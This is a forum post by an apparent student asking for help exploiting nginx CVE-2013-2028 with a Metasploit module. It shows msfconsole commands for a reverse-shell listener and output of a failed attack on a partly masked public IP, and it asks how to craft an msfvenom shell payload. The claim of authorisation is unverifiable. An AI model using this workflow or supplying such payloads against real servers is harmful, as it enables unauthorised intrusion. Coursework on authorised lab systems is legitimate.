Exploitation of nginx_chunked_size vulnerabilities
May 31, 2022 11:43AM
Hello world!

I am currently studying a systems engineering degree, and one of the courses is named "Data security". In one fictitious case, the professor ordered us to exploit a host (really a VMware virtual machine) of an "Aeronautical company (in this case it could be Boeing or Lockheed)" and later present him some recommendations in order to avoid future intrusion. This is part of an exam or academic activity. Well, I made a vulnerability scan with an NSE script and the scanner returned me the following vulns: [CVE-2013-2028] the ngx_http_parse_chunked function (in the CVE database), and it returned me the exploitdb entry as well: [25775] Nginx 1.3.9 < 1.4.0 - Chunked Encoding Stack Buffer Overflow (Metasploit). I downloaded the script and followed the next steps:

msf6 exploit(linux/remote/25775) > set ReverseListenerBindAddress #I set my private ip
ReverseListenerBindAddress =>
msf6 exploit(linux/remote/25775) > set LHOST 190.*******121 #I supposed that since the host is remote, I should set my public IP.
msf6 exploit(linux/remote/25775) > set ReverseListenerBindPort 4444
ReverseListenerBindPort => 4444
msf6 exploit(linux/remote/25775) > set LPORT 4444
LPORT => 4444
msf6 exploit(linux/remote/25775) > run

But this is what msfconsole returned me:

[*] Started reverse TCP handler on
[*] - 200.******:80 - Searching for stack canary
[*] - 200.******175:80 - Assuming byte 0 0x00
[*] - 200******175:80 - Bruteforcing byte 1
[*] - 200******175:80 - Bruteforcing byte 2
[-] - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (200.*****175:80) timed out.
[*] Exploit completed, but no session was created

Now, I'd like to make clear some of my considerations.

First: At the beginning, I thought that it could be a firewall blocking the connection on port 4444. So I used the command sudo ufw allow 4444 and it returned me the message: Rule Added (v6). But it is still not working.

Second: I believe the main error is the payload. I saw in other examples that I must create a payload with msfvenom that adapts better to the default exploit. But the problem is that I tried without any satisfactory result. Could you please tell me how to create a payload that opens a shell on the virtual machine? The host executes Linux kernel 4.4.x (probably it is Ubuntu 16.04).

Third: If you know the nginx server, could you please tell me what is the best way to exploit one?

PS: This is in no way an illegal activity, it is just an evaluated activity that the course professor ordered us to do.

Thanks, and I'd appreciate the help!